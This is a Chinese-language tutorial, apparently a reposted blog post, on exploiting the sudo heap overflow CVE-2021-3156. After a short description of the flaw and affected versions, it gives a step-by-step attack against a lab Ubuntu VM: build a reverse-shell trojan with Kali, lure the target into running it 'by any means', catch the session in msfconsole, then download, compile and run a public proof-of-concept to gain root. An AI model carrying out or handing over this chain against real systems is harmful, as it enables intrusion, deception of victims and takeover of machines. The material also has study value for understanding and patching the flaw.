利用CVE-2021-3156進行遠程提權
一、漏洞簡介
2021年1月26日,Linux安全工具sudo被發現嚴重的基于堆緩沖區溢位漏洞,利用這一漏洞,攻擊者無需知道用戶密碼,一樣可以獲得root權限,并且是在默認配置下,此漏洞已分配為CVE-2021-3156,危險等級評分為7分.
當sudo通過-s或-i命令列選項在shell模式下運行命令時,它將在命令引數中使用反斜杠轉義特殊字符,但使用-s或-i標志運行sudoedit時,實際上并未進行轉義,從而可能導致緩沖區溢位,因此只要存在sudoers檔案(通常是/etc/sudoers),攻擊者就可以使用本地普通用戶利用sudo獲得系統root權限,研究人員利用該漏洞在多個Linux發行版上成功獲得了完整的root權限,包括Ubuntu 20.04(sudo 1.8.31)、Debian 10(sudo 1.8.27)和Fedora 33(sudo 1.9.2),并且sudo支持的其他作業系統和Linux發行版也很容易受到攻擊,
漏洞的影響范圍
Sudo 1.8.2 – 1.8.31p2
Sudo 1.9.0 – 1.9.5p1
不受影響版本
sudo =>1.9.5p2
二、遠程利用漏洞進行提權
攻擊主機:kali-Linux-2021.3(ip;192.168.31.105)
靶機:Ubuntu-18.04.5
靶機下載鏈接:https://pan.baidu.com/s/1hTdZvaqHUqeRumMUr8QTPA
提取碼:long
-
使用kali創建木馬—shell.elf
-
通過一切手段引誘靶機下載并運行shell.elf
運行
-
運行msfconsole
-
打開監聽模塊并設定監聽主機的ip(kali的ip地址)和埠(木馬程式中設定的埠,我設定的為5555)
-
使用exploit運行模塊
可以看出已經建立了連接
6. 下載漏洞POC:https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
-
上傳檔案到靶機(如何確定上傳位置,輸入shell,進入命令列,輸入whoami)
-
在命令列中輸入tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gz
-
輸入:ls,查看解壓到那個檔案里面,并輸入:cd CVE-2021-3156進入檔案夾
-
輸入make,進行編譯exp
-
輸入:chmod a+x sudo-hax-me-a-sandwich添加執行權限
-
輸入:’./sudo-hax-me-a-sandwich 1‘運行exp進行提權
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/342114.html
標籤:其他